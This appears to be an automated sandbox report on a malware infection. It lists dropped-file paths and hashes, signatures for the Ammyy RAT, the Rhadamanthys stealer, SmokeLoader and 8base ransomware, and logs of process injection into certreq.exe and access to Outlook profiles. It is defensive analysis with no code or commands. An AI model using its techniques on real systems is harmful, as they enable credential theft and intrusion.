memory/3880-2289-0x0000000004D60000-0x0000000004D70000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\B496.exe

MD5 20bb118569b859e64feaaf30227e04b8
SHA1 3fb2c608529575ad4b06770e130eb9d2d0750ed7
SHA256 c1d2e8b7b961e48a1ee4877d3f527f038697e0dfcda69b8cd470900b73e1e674
SHA512 567906d7b98058ec24c1455d5167ee13127ce6739350f1f38954c01e46f96ba0851d6c88ef49a192edb53c5f759ab8663c7ac9fcc795c35db98165d11259587c

C:\Users\Admin\AppData\Local\Temp\B496.exe

MD5 20bb118569b859e64feaaf30227e04b8
SHA1 3fb2c608529575ad4b06770e130eb9d2d0750ed7
SHA256 c1d2e8b7b961e48a1ee4877d3f527f038697e0dfcda69b8cd470900b73e1e674
SHA512 567906d7b98058ec24c1455d5167ee13127ce6739350f1f38954c01e46f96ba0851d6c88ef49a192edb53c5f759ab8663c7ac9fcc795c35db98165d11259587c

memory/1228-2336-0x0000000000200000-0x000000000027C000-memory.dmp

memory/1228-2335-0x00000000749F0000-0x00000000751A0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\B188.exe

MD5 b540d836ffd19faa25af885e6d305da5
SHA1 67e7a1b17251b2a0bf03715c31d620825cb90cfc
SHA256 20e4f468905a59feb933d8b83ffbca0a4b90471512be00a096c37f56153b1590
SHA512 e34c0e1fc3eaba2ea7b2cb59525adaa4fcfc7b090886e8229a6ca6f30b0666375fd5c04749d35572e7bd686ce2a24c891c665b1146d4ffb0f3e65a6d66f20bb5

memory/1228-2357-0x00000000057D0000-0x0000000005862000-memory.dmp

memory/3880-2369-0x00000000749F0000-0x00000000751A0000-memory.dmp

memory/1900-2372-0x0000000000400000-0x0000000000413000-memory.dmp

memory/1228-2368-0x0000000005870000-0x000000000590C000-memory.dmp

memory/1228-2528-0x0000000006720000-0x0000000006730000-memory.dmp

memory/1228-2549-0x0000000006660000-0x00000000066A2000-memory.dmp

memory/1228-2666-0x0000000006A20000-0x0000000006A2A000-memory.dmp

memory/1228-3716-0x00000000749F0000-0x00000000751A0000-memory.dmp

memory/1228-3726-0x0000000006720000-0x0000000006730000-memory.dmp

memory/1900-3781-0x0000000000400000-0x0000000000413000-memory.dmp

memory/1228-3965-0x0000000007B10000-0x0000000007B2A000-memory.dmp

memory/1228-3994-0x0000000007B70000-0x0000000007B76000-memory.dmp

memory/1228-4051-0x0000000006720000-0x0000000006730000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\ECAF.exe

MD5 86e4447c89dad11996270b6c538f2805
SHA1 a91abbd12885320ca177b5a00792156a30e72a37
SHA256 31a736e30a56614796a42b127e62900f40ca06b877941a1ad240e082b1b96aa9
SHA512 d7426ebabe1ac0d56262fef456ecdca3f991ffc72aaff9fa081bf75e614779cb71669f046b04285d2107ce0ad5ef66ed4312301ce38caa24ecd7cbf7a014609d

C:\Users\Admin\AppData\Local\Temp\ECAF.exe

MD5 86e4447c89dad11996270b6c538f2805
SHA1 a91abbd12885320ca177b5a00792156a30e72a37
SHA256 31a736e30a56614796a42b127e62900f40ca06b877941a1ad240e082b1b96aa9
SHA512 d7426ebabe1ac0d56262fef456ecdca3f991ffc72aaff9fa081bf75e614779cb71669f046b04285d2107ce0ad5ef66ed4312301ce38caa24ecd7cbf7a014609d

memory/1980-4262-0x00000000749F0000-0x00000000751A0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\EE27.exe

MD5 31277de974d31978d4013701dee62a4b
SHA1 1e82d394f4c3709215d31fa87172f31d02a198eb
SHA256 eb2a6bff370821d00b58842c80ba0564d699a9d7b82f5af391c5870d239ce671
SHA512 c152c8cb9a4eef5d86dbb85b529eb3bbffa32a0da7912daaffd78cf1c2ca0b95cbc1a7b063df759ebce959e53211a34bcda1ba143c5e30956e3e0db6717c3b29

C:\Users\Admin\AppData\Local\Temp\EE27.exe

MD5 31277de974d31978d4013701dee62a4b
SHA1 1e82d394f4c3709215d31fa87172f31d02a198eb
SHA256 eb2a6bff370821d00b58842c80ba0564d699a9d7b82f5af391c5870d239ce671
SHA512 c152c8cb9a4eef5d86dbb85b529eb3bbffa32a0da7912daaffd78cf1c2ca0b95cbc1a7b063df759ebce959e53211a34bcda1ba143c5e30956e3e0db6717c3b29

memory/1980-4271-0x0000000000B00000-0x00000000013B6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\B496.exe

MD5 20bb118569b859e64feaaf30227e04b8
SHA1 3fb2c608529575ad4b06770e130eb9d2d0750ed7
SHA256 c1d2e8b7b961e48a1ee4877d3f527f038697e0dfcda69b8cd470900b73e1e674
SHA512 567906d7b98058ec24c1455d5167ee13127ce6739350f1f38954c01e46f96ba0851d6c88ef49a192edb53c5f759ab8663c7ac9fcc795c35db98165d11259587c

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x00o19f5.default-release\cookies.sqlite.id[8BE9EB4B-3483].[[email protected]].8base

MD5 95d9b8ddc443e1da83f0ad1fff011b24
SHA1 65cb18d480949ac0f0f0fd32ef3c6dda518a1ee0
SHA256 69a98eb0a6a55a6c25064e42c5ff217f51accecabf04ad5493922ecb5abddfd2
SHA512 2a54f05f53f890178c642f76ad8ab04e650fd3aaa85c79bc4d0da35f868d8f11dc18988d1a48f97cf89c0419398cc3b4d1f1206e0a2047f6d7b8becd63659338

C:\Users\Admin\AppData\Local\Temp\B496.exe

MD5 20bb118569b859e64feaaf30227e04b8
SHA1 3fb2c608529575ad4b06770e130eb9d2d0750ed7
SHA256 c1d2e8b7b961e48a1ee4877d3f527f038697e0dfcda69b8cd470900b73e1e674
SHA512 567906d7b98058ec24c1455d5167ee13127ce6739350f1f38954c01e46f96ba0851d6c88ef49a192edb53c5f759ab8663c7ac9fcc795c35db98165d11259587c

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ECAF.exe.log

MD5 f7047b64aa01f9d80c7a5e177ce2485c
SHA1 bab6005f4a30f12ee36b9abf6bfdfaa5411bbff8
SHA256 807356d2424d2d04f51ebd56f926d4d5a8318bc947c76569a3b5ca2c2f279915
SHA512 a9af5ace72eb66a6156a5d8764031cdc46feefffabb6898651f91a5af7f3bcef645e63e8d01ed35f1105e824d6830f6fa97e70adda2d5b148ffaff5f54ca248f

C:\Users\Admin\AppData\Local\Temp\ECAF.exe

MD5 86e4447c89dad11996270b6c538f2805
SHA1 a91abbd12885320ca177b5a00792156a30e72a37
SHA256 31a736e30a56614796a42b127e62900f40ca06b877941a1ad240e082b1b96aa9
SHA512 d7426ebabe1ac0d56262fef456ecdca3f991ffc72aaff9fa081bf75e614779cb71669f046b04285d2107ce0ad5ef66ed4312301ce38caa24ecd7cbf7a014609d

C:\Users\Admin\AppData\Local\Temp\Update.bat

MD5 73a4d310cdd90000b9cc71223411c40f
SHA1 b068ef9b457bab0ff610047b8f277213c3f26c5b
SHA256 1cc2e10d240a44dca38dd1be915311886213e37e4c1b3006090ed7d33b0b53ff
SHA512 1adea98392da014b1a97259612f647e807cb7f0189bbe6a6689d5d1e83899943ad8647564f71ed870e4671a3cbe98614653170e26b56cce71bb820836bb796e1

C:\Users\Admin\AppData\Local\Temp\2CE2.tmp\svchost.exe

MD5 90aadf2247149996ae443e2c82af3730
SHA1 050b7eba825412b24e3f02d76d7da5ae97e10502
SHA256 ee573647477339784dcef81024de1be1762833a20e5cc2b89a93e47d05b86b6a
SHA512 eec32bb82b230dd309c29712e72d4469250e651449e127479d178eddbafd5a46ec8048a753bc2c1a0fdf1dc3ed72a9453ca66fb49cbf0f95a12704e5427182be

C:\Users\Admin\AppData\Local\Temp\2CE2.tmp\svchost.exe

MD5 90aadf2247149996ae443e2c82af3730
SHA1 050b7eba825412b24e3f02d76d7da5ae97e10502
SHA256 ee573647477339784dcef81024de1be1762833a20e5cc2b89a93e47d05b86b6a
SHA512 eec32bb82b230dd309c29712e72d4469250e651449e127479d178eddbafd5a46ec8048a753bc2c1a0fdf1dc3ed72a9453ca66fb49cbf0f95a12704e5427182be

C:\Users\Admin\AppData\Local\WindowsSecurity\ECAF.exe

MD5 86e4447c89dad11996270b6c538f2805
SHA1 a91abbd12885320ca177b5a00792156a30e72a37
SHA256 31a736e30a56614796a42b127e62900f40ca06b877941a1ad240e082b1b96aa9
SHA512 d7426ebabe1ac0d56262fef456ecdca3f991ffc72aaff9fa081bf75e614779cb71669f046b04285d2107ce0ad5ef66ed4312301ce38caa24ecd7cbf7a014609d

C:\Users\Admin\AppData\Local\WindowsSecurity\ECAF.exe

MD5 86e4447c89dad11996270b6c538f2805
SHA1 a91abbd12885320ca177b5a00792156a30e72a37
SHA256 31a736e30a56614796a42b127e62900f40ca06b877941a1ad240e082b1b96aa9
SHA512 d7426ebabe1ac0d56262fef456ecdca3f991ffc72aaff9fa081bf75e614779cb71669f046b04285d2107ce0ad5ef66ed4312301ce38caa24ecd7cbf7a014609d

C:\Users\Admin\AppData\Local\WindowsSecurity\ECAF.exe

MD5 86e4447c89dad11996270b6c538f2805
SHA1 a91abbd12885320ca177b5a00792156a30e72a37
SHA256 31a736e30a56614796a42b127e62900f40ca06b877941a1ad240e082b1b96aa9
SHA512 d7426ebabe1ac0d56262fef456ecdca3f991ffc72aaff9fa081bf75e614779cb71669f046b04285d2107ce0ad5ef66ed4312301ce38caa24ecd7cbf7a014609d

C:\Users\Admin\AppData\Local\Temp\2CE2.tmp\aa_nts.dll

MD5 480a66902e6e7cdafaa6711e8697ff8c
SHA1 6ac730962e7c1dba9e2ecc5733a506544f3c8d11
SHA256 7eaaaa6010bbcd6bb8c9ad08d4b0966c7aedc9b2ac24758f170012ac36e508b5
SHA512 7d010cd47b7d1adf66f9c97afc6c3805997aa5c7cc6ff13eddee81f24cf2b95a3fe375ec5b3d6185c0bc8840b4ad91ae143c73a39af26391cc182ab6a1793ba5

C:\Users\Admin\AppData\Local\Temp\2CE2.tmp\aa_nts.dll

MD5 480a66902e6e7cdafaa6711e8697ff8c
SHA1 6ac730962e7c1dba9e2ecc5733a506544f3c8d11
SHA256 7eaaaa6010bbcd6bb8c9ad08d4b0966c7aedc9b2ac24758f170012ac36e508b5
SHA512 7d010cd47b7d1adf66f9c97afc6c3805997aa5c7cc6ff13eddee81f24cf2b95a3fe375ec5b3d6185c0bc8840b4ad91ae143c73a39af26391cc182ab6a1793ba5

C:\Users\Admin\AppData\Local\Temp\2CE2.tmp\aa_nts.msg

MD5 3f05819f995b4dafa1b5d55ce8d1f411
SHA1 404449b79a16bfc4f64f2fd55cd73d5d27a85d71
SHA256 7e0bf0cbd06a087500a9c3b50254df3a8a2c2980921ab6a62ab1121941c80fc0
SHA512 34abb7df8b3a68e1649ff0d2762576a4d4e65da548e74b1aa65c2b82c1b89f90d053ecddac67c614ca6084dc5b2cb552949250fb70f49b536f1bcb0057717026

C:\Users\Admin\AppData\Local\Temp\Update.bat

MD5 73a4d310cdd90000b9cc71223411c40f
SHA1 b068ef9b457bab0ff610047b8f277213c3f26c5b
SHA256 1cc2e10d240a44dca38dd1be915311886213e37e4c1b3006090ed7d33b0b53ff
SHA512 1adea98392da014b1a97259612f647e807cb7f0189bbe6a6689d5d1e83899943ad8647564f71ed870e4671a3cbe98614653170e26b56cce71bb820836bb796e1

C:\Users\Admin\AppData\Local\WindowsSecurity\ECAF.exe

MD5 86e4447c89dad11996270b6c538f2805
SHA1 a91abbd12885320ca177b5a00792156a30e72a37
SHA256 31a736e30a56614796a42b127e62900f40ca06b877941a1ad240e082b1b96aa9
SHA512 d7426ebabe1ac0d56262fef456ecdca3f991ffc72aaff9fa081bf75e614779cb71669f046b04285d2107ce0ad5ef66ed4312301ce38caa24ecd7cbf7a014609d

C:\Users\Admin\AppData\Local\Temp\Update.bat

MD5 73a4d310cdd90000b9cc71223411c40f
SHA1 b068ef9b457bab0ff610047b8f277213c3f26c5b
SHA256 1cc2e10d240a44dca38dd1be915311886213e37e4c1b3006090ed7d33b0b53ff
SHA512 1adea98392da014b1a97259612f647e807cb7f0189bbe6a6689d5d1e83899943ad8647564f71ed870e4671a3cbe98614653170e26b56cce71bb820836bb796e1

C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe

MD5 d1ce628a81ab779f1e8f7bf7df1bb32c
SHA1 011c90c704bb4782001d6e6ce1c647bf2bb17e01
SHA256 2afb05a73ddb32ae71ebdc726a9956d844bf8f0deba339928ca8edce6427df71
SHA512 de44fff7a679138bae71103190ab450b17590df3c3dde466a54da80d2102a04fc6e12ad65448d9d935e01b577651121184b63133be6cb010aaa32d39786c740f

C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe

MD5 d1ce628a81ab779f1e8f7bf7df1bb32c
SHA1 011c90c704bb4782001d6e6ce1c647bf2bb17e01
SHA256 2afb05a73ddb32ae71ebdc726a9956d844bf8f0deba339928ca8edce6427df71
SHA512 de44fff7a679138bae71103190ab450b17590df3c3dde466a54da80d2102a04fc6e12ad65448d9d935e01b577651121184b63133be6cb010aaa32d39786c740f

C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe

MD5 d1ce628a81ab779f1e8f7bf7df1bb32c
SHA1 011c90c704bb4782001d6e6ce1c647bf2bb17e01
SHA256 2afb05a73ddb32ae71ebdc726a9956d844bf8f0deba339928ca8edce6427df71
SHA512 de44fff7a679138bae71103190ab450b17590df3c3dde466a54da80d2102a04fc6e12ad65448d9d935e01b577651121184b63133be6cb010aaa32d39786c740f

C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\libcrypto.dll

MD5 79a6e2268dfdba1d94c27f4b17265ff4
SHA1 b17eed8cb6f454700f8bfcfd315d5627d3cf741c
SHA256 6562ae65844bd9bb6d70908bfb67bc03e85053e6e0673457b0341a7ad5a957d5
SHA512 3ebe640a6395f6fbcfb28afe6383b8911f2d30847699dcbcbe1a0f5d9e090a9b7f714d5aa4e6a9891e72109edf494efaf0b7b2bb954e2763b1fbba2946c9723c

C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\libcrypto.dll

MD5 79a6e2268dfdba1d94c27f4b17265ff4
SHA1 b17eed8cb6f454700f8bfcfd315d5627d3cf741c
SHA256 6562ae65844bd9bb6d70908bfb67bc03e85053e6e0673457b0341a7ad5a957d5
SHA512 3ebe640a6395f6fbcfb28afe6383b8911f2d30847699dcbcbe1a0f5d9e090a9b7f714d5aa4e6a9891e72109edf494efaf0b7b2bb954e2763b1fbba2946c9723c

C:\Users\Admin\AppData\Local\Temp\B496.exe

MD5 20bb118569b859e64feaaf30227e04b8
SHA1 3fb2c608529575ad4b06770e130eb9d2d0750ed7
SHA256 c1d2e8b7b961e48a1ee4877d3f527f038697e0dfcda69b8cd470900b73e1e674
SHA512 567906d7b98058ec24c1455d5167ee13127ce6739350f1f38954c01e46f96ba0851d6c88ef49a192edb53c5f759ab8663c7ac9fcc795c35db98165d11259587c

C:\Users\Admin\AppData\Local\WindowsSecurity\ECAF.exe

MD5 86e4447c89dad11996270b6c538f2805
SHA1 a91abbd12885320ca177b5a00792156a30e72a37
SHA256 31a736e30a56614796a42b127e62900f40ca06b877941a1ad240e082b1b96aa9
SHA512 d7426ebabe1ac0d56262fef456ecdca3f991ffc72aaff9fa081bf75e614779cb71669f046b04285d2107ce0ad5ef66ed4312301ce38caa24ecd7cbf7a014609d

C:\Users\Admin\AppData\Local\Temp\Update.bat.exe

MD5 c32ca4acfcc635ec1ea6ed8a34df5fac
SHA1 f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919
SHA256 73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70
SHA512 6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc

Analysis: behavioral1

Detonation Overview

Submitted

2023-10-01 17:38

Reported

2023-10-01 17:41

Platform

win7-20230831-en

Max time kernel

87s

Max time network

152s

Command Line

C:\Windows\Explorer.EXE

Signatures

Ammyy Admin

rat ammyyadmin

AmmyyAdmin payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Detect rhadamanthys stealer shellcode

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

FlawedAmmyy RAT

trojan flawedammyy

Rhadamanthys

stealer rhadamanthys

SmokeLoader

trojan backdoor smokeloader

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 2556 created 1264 N/A C:\Users\Admin\AppData\Local\Temp\rh111.exe C:\Windows\Explorer.EXE

Downloads MZ/PE file

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\system32\certreq.exe N/A

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Office\11.0\Outlook\Profiles\Outlook C:\Windows\system32\certreq.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook C:\Windows\system32\certreq.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook C:\Windows\system32\certreq.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook C:\Windows\system32\certreq.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\explorer.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\explorer.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\explorer.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Office\10.0\Outlook\Profiles\Outlook C:\Windows\system32\certreq.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Office\12.0\Outlook\Profiles\Outlook C:\Windows\system32\certreq.exe N/A

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\2D96.exe

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Microsoft\3r7[o7V`VR.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Microsoft\3r7[o7V`VR.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Microsoft\3r7[o7V`VR.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\system32\certreq.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\system32\certreq.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\rh111.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\rh111.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\rh111.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\rh111.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\rh111.exe N/A
N/A N/A C:\Windows\system32\certreq.exe N/A
N/A N/A C:\Windows\system32\certreq.exe N/A
N/A N/A C:\Windows\system32\certreq.exe N/A
N/A N/A C:\Windows\system32\certreq.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\3r7[o7V`VR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\3r7[o7V`VR.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\rh111.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Microsoft\2%r2R.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Microsoft\3r7[o7V`VR.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2D96.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\344B.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2196 wrote to memory of 2556 N/A C:\Users\Admin\AppData\Local\Temp\rh111.exe C:\Users\Admin\AppData\Local\Temp\rh111.exe
PID 2196 wrote to memory of 2556 N/A C:\Users\Admin\AppData\Local\Temp\rh111.exe C:\Users\Admin\AppData\Local\Temp\rh111.exe
PID 2196 wrote to memory of 2556 N/A C:\Users\Admin\AppData\Local\Temp\rh111.exe C:\Users\Admin\AppData\Local\Temp\rh111.exe
PID 2196 wrote to memory of 2556 N/A C:\Users\Admin\AppData\Local\Temp\rh111.exe C:\Users\Admin\AppData\Local\Temp\rh111.exe
PID 2196 wrote to memory of 2556 N/A C:\Users\Admin\AppData\Local\Temp\rh111.exe C:\Users\Admin\AppData\Local\Temp\rh111.exe
PID 2196 wrote to memory of 2556 N/A C:\Users\Admin\AppData\Local\Temp\rh111.exe C:\Users\Admin\AppData\Local\Temp\rh111.exe
PID 2196 wrote to memory of 2556 N/A C:\Users\Admin\AppData\Local\Temp\rh111.exe C:\Users\Admin\AppData\Local\Temp\rh111.exe
PID 2196 wrote to memory of 2556 N/A C:\Users\Admin\AppData\Local\Temp\rh111.exe C:\Users\Admin\AppData\Local\Temp\rh111.exe
PID 2196 wrote to memory of 2556 N/A C:\Users\Admin\AppData\Local\Temp\rh111.exe C:\Users\Admin\AppData\Local\Temp\rh111.exe
PID 2556 wrote to memory of 2472 N/A C:\Users\Admin\AppData\Local\Temp\rh111.exe C:\Windows\system32\certreq.exe
PID 2556 wrote to memory of 2472 N/A C:\Users\Admin\AppData\Local\Temp\rh111.exe C:\Windows\system32\certreq.exe
PID 2556 wrote to memory of 2472 N/A C:\Users\Admin\AppData\Local\Temp\rh111.exe C:\Windows\system32\certreq.exe
PID 2556 wrote to memory of 2472 N/A C:\Users\Admin\AppData\Local\Temp\rh111.exe C:\Windows\system32\certreq.exe
PID 2556 wrote to memory of 2472 N/A C:\Users\Admin\AppData\Local\Temp\rh111.exe C:\Windows\system32\certreq.exe
PID 2556 wrote to memory of 2472 N/A C:\Users\Admin\AppData\Local\Temp\rh111.exe C:\Windows\system32\certreq.exe
PID 2920 wrote to memory of 2900 N/A C:\Users\Admin\AppData\Local\Microsoft\2%r2R.exe C:\Users\Admin\AppData\Local\Microsoft\2%r2R.exe
PID 2920 wrote to memory of 2900 N/A C:\Users\Admin\AppData\Local\Microsoft\2%r2R.exe C:\Users\Admin\AppData\Local\Microsoft\2%r2R.exe
PID 2920 wrote to memory of 2900 N/A C:\Users\Admin\AppData\Local\Microsoft\2%r2R.exe C:\Users\Admin\AppData\Local\Microsoft\2%r2R.exe
PID 2920 wrote to memory of 2900 N/A C:\Users\Admin\AppData\Local\Microsoft\2%r2R.exe C:\Users\Admin\AppData\Local\Microsoft\2%r2R.exe
PID 2920 wrote to memory of 2900 N/A C:\Users\Admin\AppData\Local\Microsoft\2%r2R.exe C:\Users\Admin\AppData\Local\Microsoft\2%r2R.exe
PID 2552 wrote to memory of 2564 N/A C:\Users\Admin\AppData\Local\Microsoft\3r7[o7V`VR.exe C:\Users\Admin\AppData\Local\Microsoft\3r7[o7V`VR.exe
PID 2552 wrote to memory of 2564 N/A C:\Users\Admin\AppData\Local\Microsoft\3r7[o7V`VR.exe C:\Users\Admin\AppData\Local\Microsoft\3r7[o7V`VR.exe
PID 2552 wrote to memory of 2564 N/A C:\Users\Admin\AppData\Local\Microsoft\3r7[o7V`VR.exe C:\Users\Admin\AppData\Local\Microsoft\3r7[o7V`VR.exe
PID 2552 wrote to memory of 2564 N/A C:\Users\Admin\AppData\Local\Microsoft\3r7[o7V`VR.exe C:\Users\Admin\AppData\Local\Microsoft\3r7[o7V`VR.exe
PID 2552 wrote to memory of 2564 N/A C:\Users\Admin\AppData\Local\Microsoft\3r7[o7V`VR.exe C:\Users\Admin\AppData\Local\Microsoft\3r7[o7V`VR.exe
PID 2552 wrote to memory of 2564 N/A C:\Users\Admin\AppData\Local\Microsoft\3r7[o7V`VR.exe C:\Users\Admin\AppData\Local\Microsoft\3r7[o7V`VR.exe
PID 2552 wrote to memory of 2564 N/A C:\Users\Admin\AppData\Local\Microsoft\3r7[o7V`VR.exe C:\Users\Admin\AppData\Local\Microsoft\3r7[o7V`VR.exe
PID 1264 wrote to memory of 1192 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\2D96.exe
PID 1264 wrote to memory of 1192 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\2D96.exe
PID 1264 wrote to memory of 1192 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\2D96.exe
PID 1264 wrote to memory of 1192 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\2D96.exe
PID 1192 wrote to memory of 1616 N/A C:\Users\Admin\AppData\Local\Temp\2D96.exe C:\Users\Admin\AppData\Local\Temp\2D96.exe
PID 1192 wrote to memory of 1616 N/A C:\Users\Admin\AppData\Local\Temp\2D96.exe C:\Users\Admin\AppData\Local\Temp\2D96.exe
PID 1192 wrote to memory of 1616 N/A C:\Users\Admin\AppData\Local\Temp\2D96.exe C:\Users\Admin\AppData\Local\Temp\2D96.exe
PID 1192 wrote to memory of 1616 N/A C:\Users\Admin\AppData\Local\Temp\2D96.exe C:\Users\Admin\AppData\Local\Temp\2D96.exe
PID 1192 wrote to memory of 1616 N/A C:\Users\Admin\AppData\Local\Temp\2D96.exe C:\Users\Admin\AppData\Local\Temp\2D96.exe
PID 1192 wrote to memory of 1616 N/A C:\Users\Admin\AppData\Local\Temp\2D96.exe C:\Users\Admin\AppData\Local\Temp\2D96.exe
PID 1192 wrote to memory of 1616 N/A C:\Users\Admin\AppData\Local\Temp\2D96.exe C:\Users\Admin\AppData\Local\Temp\2D96.exe
